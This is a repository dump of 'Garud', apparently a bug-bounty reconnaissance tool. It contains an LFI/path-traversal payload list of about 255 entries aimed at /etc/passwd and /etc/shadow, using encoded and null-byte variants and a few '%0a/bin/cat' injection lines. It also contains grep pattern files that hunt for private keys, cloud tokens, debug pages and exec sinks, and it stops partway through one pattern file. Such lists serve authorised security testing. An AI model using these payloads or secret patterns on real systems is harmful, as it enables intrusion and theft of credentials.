├── .dockerignore ├── .github ├── FUNDING.yml ├── contributors.md ├── img │ ├── garud.png │ ├── mindmap.png │ ├── roadmap.png │ └── support.svg ├── payloads │ ├── lfi.txt │ ├── patterns │ │ ├── asymmetric-keys_secrets.json │ │ ├── auth.json │ │ ├── aws-keys.json │ │ ├── aws-keys_secrets.json │ │ ├── aws-s3_secrets.json │ │ ├── badwords.json │ │ ├── base64.json │ │ ├── ccode.json │ │ ├── cors.json │ │ ├── crypto.json │ │ ├── debug-pages.json │ │ ├── debug_logic.json │ │ ├── execs.json │ │ ├── facebook-oauth_secrets.json │ │ ├── facebook-token_secrets.json │ │ ├── firebase.json │ │ ├── firebase_secrets.json │ │ ├── fw.json │ │ ├── github_secrets.json │ │ ├── go-functions.json │ │ ├── google-keys_secrets.json │ │ ├── google-oauth_secrets.json │ │ ├── google-service-account_secrets.json │ │ ├── google-token_secrets.json │ │ ├── heroku-keys_secrets.json │ │ ├── http-auth.json │ │ ├── idor.json │ │ ├── img-traversal.json │ │ ├── interestingEXT.json │ │ ├── interestingparams.json │ │ ├── interestingsubs.json │ │ ├── ip.json │ │ ├── json-sec.json │ │ ├── jsvar.json │ │ ├── jwt.json │ │ ├── lfi.json │ │ ├── mailchimp-keys_secrets.json │ │ ├── mailgun-keys_secrets.json │ │ ├── meg-headers.json │ │ ├── parsers.json │ │ ├── paypal-token_secrets.json │ │ ├── php-curl.json │ │ ├── php-errors.json │ │ ├── php-serialized.json │ │ ├── php-sinks.json │ │ ├── php-sources.json │ │ ├── picatic-keys_secrets.json │ │ ├── rce.json │ │ ├── redirect.json │ │ ├── s3-buckets.json │ │ ├── sec.json │ │ ├── secrets.json │ │ ├── serial.json │ │ ├── servers.json │ │ ├── slack-token_secrets.json │ │ ├── slack-webhook_secrets.json │ │ ├── sqli.json │ │ ├── square-keys_secrets.json │ │ ├── ssrf.json │ │ ├── ssti.json │ │ ├── strings.json │ │ ├── stripe-keys_secrets.json │ │ ├── swearwords.json │ │ ├── takeovers.json │ │ ├── twilio-keys_secrets.json │ │ ├── twitter-oauth_secrets.json │ │ ├── twitter-token_secrets.json │ │ ├── upload-fields.json │ │ ├── urls.json │ │ ├── xml.json │ │ └── xss.json │ └── ssti.txt └── workflows │ └── push-to-docker.yml ├── Dockerfile ├── LICENSE ├── README.md ├── garud └── install.sh /.dockerignore: -------------------------------------------------------------------------------- 1 | Dockerfile -------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | ko_fi: R0X4R 3 | custom: ['https://pmny.in/bIKNZngt4ys1', 'https://www.buymeacoffee.com/R0X4R', 'https://www.paypal.com/paypalme/r0x4r'] -------------------------------------------------------------------------------- /.github/contributors.md: -------------------------------------------------------------------------------- 1 | ## **Thanks to the heros** 2 | 3 | --- 4 | Many people have contributed to **Garud** making it a wonderful tool either by making a pull request fixing some stuff. Here, I recognize these persons and thank them. 5 | 6 |
7 | 8 | | Avatar | Username | Name| 9 | |------|------|-----| 10 | |
| [`@frost19k`](https://github.com/frost19k) | **Maaz Basar** | 11 | |
| [`@KathanP19`](https://github.com/KathanP19) | **Kathan Patel** | 12 | |
| [`@f8al`](https://github.com/f8al) | **SecurityShrimp** | 13 | |
| [`@hangyakuzero`](https://github.com/hangyakuzero) | **maharshi** | 14 | |
| [`@simrotion13`](https://github.com/simrotion13) | **Simba Gill** | 15 | |
| [`@theamanrawat`](https://github.com/theamanrawat) | **Aman Rawat** | -------------------------------------------------------------------------------- /.github/img/garud.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R0X4R/Garud/58b81f6abad2fce2add9e5f020025e887a63f596/.github/img/garud.png -------------------------------------------------------------------------------- /.github/img/mindmap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R0X4R/Garud/58b81f6abad2fce2add9e5f020025e887a63f596/.github/img/mindmap.png -------------------------------------------------------------------------------- /.github/img/roadmap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R0X4R/Garud/58b81f6abad2fce2add9e5f020025e887a63f596/.github/img/roadmap.png -------------------------------------------------------------------------------- /.github/img/support.svg: -------------------------------------------------------------------------------- 1 | 2 | New Project 3 | 4 | 5 | 6 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.github/payloads/lfi.txt: -------------------------------------------------------------------------------- 1 | /etc/passwd 2 | ../../../../../../../../../../../../../../../../../../../../../../etc/passwd 3 | ../../../../../../../../../../../../../../../../../../../../../etc/passwd 4 | ../../../../../../../../../../../../../../../../../../../../etc/passwd 5 | ../../../../../../../../../../../../../../../../../../../etc/passwd 6 | ../../../../../../../../../../../../../../../../../../etc/passwd 7 | ../../../../../../../../../../../../../../../../../etc/passwd 8 | ../../../../../../../../../../../../../../../../etc/passwd 9 | ../../../../../../../../../../../../../../../etc/passwd 10 | ../../../../../../../../../../../../../../etc/passwd 11 | ../../../../../../../../../../../../../etc/passwd 12 | ../../../../../../../../../../../../etc/passwd 13 | ../../../../../../../../../../../etc/passwd 14 | ../../../../../../../../../../etc/passwd 15 | ../../../../../../../../../etc/passwd 16 | ../../../../../../../../etc/passwd 17 | ../../../../../../../etc/passwd 18 | ../../../../../../etc/passwd 19 | ../../../../../etc/passwd 20 | ../../../../etc/passwd 21 | ../../../etc/passwd 22 | ../../etc/passwd 23 | ../etc/passwd 24 | ..\..\..\..\..\..\..\..\..\..\etc\passwd 25 | .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 26 | \..\..\..\..\..\..\..\..\..\..\etc\passwd 27 | etc/passwd 28 | /etc/passwd%00 29 | /e?c/pa??wd 30 | ../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 31 | ../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 32 | ../../../../../../../../../../../../../../../../../../../../etc/passwd%00 33 | ../../../../../../../../../../../../../../../../../../../etc/passwd%00 34 | ../../../../../../../../../../../../../../../../../../etc/passwd%00 35 | ../../../../../../../../../../../../../../../../../etc/passwd%00 36 | ../../../../../../../../../../../../../../../../etc/passwd%00 37 | ../../../../../../../../../../../../../../../etc/passwd%00 38 | ../../../../../../../../../../../../../../etc/passwd%00 39 | ../../../../../../../../../../../../../etc/passwd%00 40 | ../../../../../../../../../../../../etc/passwd%00 41 | ../../../../../../../../../../../etc/passwd%00 42 | ../../../../../../../../../../etc/passwd%00 43 | ../../../../../../../../../etc/passwd%00 44 | ../../../../../../../../etc/passwd%00 45 | ../../../../../../../etc/passwd%00 46 | ../../../../../../etc/passwd%00 47 | ../../../../../etc/passwd%00 48 | ../../../../etc/passwd%00 49 | ../../../etc/passwd%00 50 | ../../etc/passwd%00 51 | ../etc/passwd%00 52 | %00../../../../../../etc/passwd 53 | %00/etc/passwd%00 54 | %00../../../../../../etc/shadow 55 | %00/etc/shadow%00 56 | %0a/bin/cat%20/etc/passwd 57 | %0a/bin/cat%20/etc/shadow 58 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 59 | ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 60 | ..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed 61 | ..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd 62 | /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 63 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd 64 | /./././././././././././etc/passwd 65 | /../../../../../../../../../../etc/passwd 66 | /../../../../../../../../../../etc/passwd^^ 67 | /..\../..\../..\../..\../..\../..\../etc/passwd 68 | /etc/passwd 69 | ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 70 | \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 71 | /../../../../../../../../../../../etc/passwd%00.html 72 | /../../../../../../../../../../../etc/passwd%00.jpg 73 | ../../../../../../etc/passwd&=%3C%3C%3C%3C 74 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 75 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 76 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 77 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 78 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 79 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 80 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 81 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 82 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 83 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 84 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 85 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 86 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 87 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 88 | ....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 89 | ....\/....\/....\/....\/....\/....\/....\/etc/passwd 90 | ....\/....\/....\/....\/....\/....\/etc/passwd 91 | ....\/....\/....\/....\/....\/etc/passwd 92 | ....\/....\/....\/....\/etc/passwd 93 | ....\/....\/....\/etc/passwd 94 | ....\/....\/etc/passwd 95 | ....\/etc/passwd 96 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 97 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 98 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 99 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 100 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 101 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 102 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 103 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 104 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 105 | ....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 106 | ....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 107 | ....//....//....//....//....//....//....//....//....//....//....//etc/passwd 108 | ....//....//....//....//....//....//....//....//....//....//etc/passwd 109 | ....//....//....//....//....//....//....//....//....//etc/passwd 110 | ....//....//....//....//....//....//....//....//etc/passwd 111 | ....//....//....//....//....//....//....//etc/passwd 112 | ....//....//....//....//....//....//etc/passwd 113 | ....//....//....//....//....//etc/passwd 114 | ....//....//....//....//etc/passwd 115 | ....//....//....//etc/passwd 116 | ....//....//etc/passwd 117 | ....//etc/passwd 118 | passwd 119 | /.passwd 120 | .passwd 121 | ../.passwd 122 | passwd.dat 123 | ..2fetc2fpasswd 124 | ..2fetc2fpasswd%00 125 | ..2f..2fetc2fpasswd 126 | ..2f..2fetc2fpasswd%00 127 | ..2f..2f..2fetc2fpasswd 128 | ..2f..2f..2fetc2fpasswd%00 129 | ..2f..2f..2f..2fetc2fpasswd 130 | ..2f..2f..2f..2fetc2fpasswd%00 131 | ..2f..2f..2f..2f..2fetc2fpasswd 132 | ..2f..2f..2f..2f..2fetc2fpasswd%00 133 | ..2f..2f..2f..2f..2f..2fetc2fpasswd 134 | ..2f..2f..2f..2f..2f..2fetc2fpasswd%00 135 | ..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 136 | ..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 137 | ..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 138 | ..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 139 | ..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 140 | ..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 141 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 142 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 143 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 144 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 145 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 146 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 147 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 148 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 149 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 150 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 151 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 152 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 153 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 154 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 155 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 156 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 157 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 158 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 159 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 160 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 161 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 162 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 163 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 164 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 165 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 166 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 167 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00 168 | L2V0Yy9tYXN0ZXIucGFzc3dk 169 | L21hc3Rlci5wYXNzd2Q= 170 | ZXRjL3Bhc3N3ZA== 171 | ZXRjL3NoYWRvdyUwMA== 172 | L2V0Yy9wYXNzd2Q= 173 | L2V0Yy9wYXNzd2QlMDA= 174 | Li4vZXRjL3Bhc3N3ZA== 175 | Li4vZXRjL3Bhc3N3ZCUwMA== 176 | Li4vLi4vZXRjL3Bhc3N3ZA== 177 | Li4vLi4vZXRjL3Bhc3N3ZCUwMA== 178 | Li4vLi4vLi4vZXRjL3Bhc3N3ZA== 179 | Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 180 | Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 181 | Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 182 | Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 183 | Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 184 | Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 185 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 186 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 187 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 188 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 189 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 190 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 191 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 192 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 193 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 194 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 195 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 196 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 197 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 198 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 199 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 200 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 201 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 202 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 203 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 204 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 205 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 206 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 207 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 208 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 209 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 210 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 211 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 212 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 213 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 214 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 215 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 216 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 217 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA== 218 | /etc/passwd 219 | ../etc/passwd 220 | ../../etc/passwd 221 | ../../../etc/passwd 222 | ../../../../etc/passwd 223 | ../../../../../etc/passwd 224 | ../../../../../../etc/passwd 225 | ../../../../../../../etc/passwd 226 | ../../../../../../../../etc/passwd 227 | ../../../../../../../../../etc/passwd 228 | ../../../../../../../../../../etc/passwd 229 | ../../../../../../../../../../../etc/passwd 230 | ../../../../../../../../../../../../etc/passwd 231 | ../../../../../../../../../../../../../etc/passwd 232 | ../../../../../../../../../../../../../../etc/passwd 233 | ../../../../../../../../../../../../../../../etc/passwd 234 | ../../../../../../../../../../../../../../../../etc/passwd 235 | ../../../../../../../../../../../../../../../../../etc/passwd 236 | ../../../../../../../../../../../../../../../../../../etc/passwd 237 | /etc/passwd%00 238 | ../etc/passwd%00 239 | ../../etc/passwd%00 240 | ../../../etc/passwd%00 241 | ../../../../etc/passwd%00 242 | ../../../../../etc/passwd%00 243 | ../../../../../../etc/passwd%00 244 | ../../../../../../../etc/passwd%00 245 | ../../../../../../../../etc/passwd%00 246 | ../../../../../../../../../etc/passwd%00 247 | ../../../../../../../../../../etc/passwd%00 248 | ../../../../../../../../../../../etc/passwd%00 249 | ../../../../../../../../../../../../etc/passwd%00 250 | ../../../../../../../../../../../../../etc/passwd%00 251 | ../../../../../../../../../../../../../../etc/passwd%00 252 | ../../../../../../../../../../../../../../../etc/passwd%00 253 | ../../../../../../../../../../../../../../../../etc/passwd%00 254 | ../../../../../../../../../../../../../../../../../etc/passwd%00 255 | ../../../../../../../../../../../../../../../../../../etc/passwd%00 -------------------------------------------------------------------------------- /.github/payloads/patterns/asymmetric-keys_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "\\-\\-\\-\\-\\-BEGIN ((EC|PGP|DSA|RSA|OPENSSH) )?PRIVATE KEY( BLOCK)?\\-\\-\\-\\-\\-" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/auth.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanriE", 3 | "pattern": "(privilege|permissions|capability|role|rbac|policy|authorization|auth|claims|access|login|register|registration|logout)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/aws-keys.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanE", 3 | "pattern": "([^A-Z0-9]|^)(AKIA|A3T|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{12,}" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/aws-keys_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "([^A-Z0-9]|^)(AKIA|A3T|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{12,}" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/aws-s3_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "patterns": [ 4 | "[a-z0-9.-]+\\.s3\\.amazonaws\\.com", 5 | "[a-z0-9.-]+\\.s3-[a-z0-9-]\\.amazonaws\\.com", 6 | "[a-z0-9.-]+\\.s3-website[.-](eu|ap|us|ca|sa|cn)", 7 | "//s3\\.amazonaws\\.com/[a-z0-9._-]+", 8 | "//s3-[a-z0-9-]+\\.amazonaws\\.com/[a-z0-9._-]+" 9 | ] 10 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/badwords.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanriE", 3 | "pattern": "(TODO|FIXME|ISSUE|TEMPORARY FIX|TEMPORARY HACK|WORKAROUND|BE CAREFUL|SENSITIVE|LEGACY|RAW|DANGEROUS|INSECURE|UNSAFE)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/base64.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HnoE", 3 | "pattern": "([^A-Za-z0-9+/]|^)(eyJ|YTo|Tzo|PD[89]|aHR0cHM6L|aHR0cDo|rO0)[%a-zA-Z0-9+/]+={0,2}" 4 | } 5 | 6 | 7 | -------------------------------------------------------------------------------- /.github/payloads/patterns/ccode.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanriE", 3 | "pattern": "(alloc|free|strcpy|gets|strncpy|strcat|sprintf|scanf)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/cors.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HniE", 3 | "patterns": [ 4 | "Access-Control-Allow" 5 | ] 6 | } 7 | -------------------------------------------------------------------------------- /.github/payloads/patterns/crypto.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanriE", 3 | "pattern": "(aes|rsa|dsa|des|cbc|ecb|hmac|gcm|privatekey|publickey|md5|sha1|sha256|cipher|crypto|encrypt|decrypt|digest)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/debug-pages.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HnaiE", 3 | "pattern": "(Application-Trace|Routing Error|DEBUG\"? ?[=:] ?True|Caused by:|stack trace:|Microsoft .NET Framework|Traceback|[0-9]:in `|#!/us|WebApplicationException|java\\.lang\\.|phpinfo|swaggerUi|on line [0-9]|SQLSTATE)" 4 | 5 | } 6 | -------------------------------------------------------------------------------- /.github/payloads/patterns/debug_logic.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | 5 | "access=", 6 | "admin=", 7 | "dbg=", 8 | "debug=", 9 | "edit=", 10 | "grant=", 11 | "test=", 12 | "alter=", 13 | "clone=", 14 | "create=", 15 | "delete=", 16 | "disable=", 17 | "enable=", 18 | "exec=", 19 | "execute=", 20 | "load=", 21 | "make=", 22 | "modify=", 23 | "rename=", 24 | "reset=", 25 | "shell=", 26 | "toggle=", 27 | "adm=", 28 | "root=", 29 | "cfg=", 30 | "config=" 31 | ] 32 | } 33 | -------------------------------------------------------------------------------- /.github/payloads/patterns/execs.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanriE", 3 | "pattern": "(eval|run|exec|process|system|popen|spawn|dup2)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/facebook-oauth_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "facebook.*['|\"][0-9a-f]{32}['|\"]" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/facebook-token_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "EAACEdEose0cBA[0-9A-Za-z]+" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/firebase.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-Hni", 3 | "pattern": "firebaseio.com" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/firebase_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "patterns": [ 4 | "[a-z0-9.-]+\\.firebaseio\\.com", 5 | "[a-z0-9.-]+\\.firebaseapp\\.com", 6 | "[a-z0-9.-]+\\.appspot\\.com" 7 | ] 8 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/fw.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": 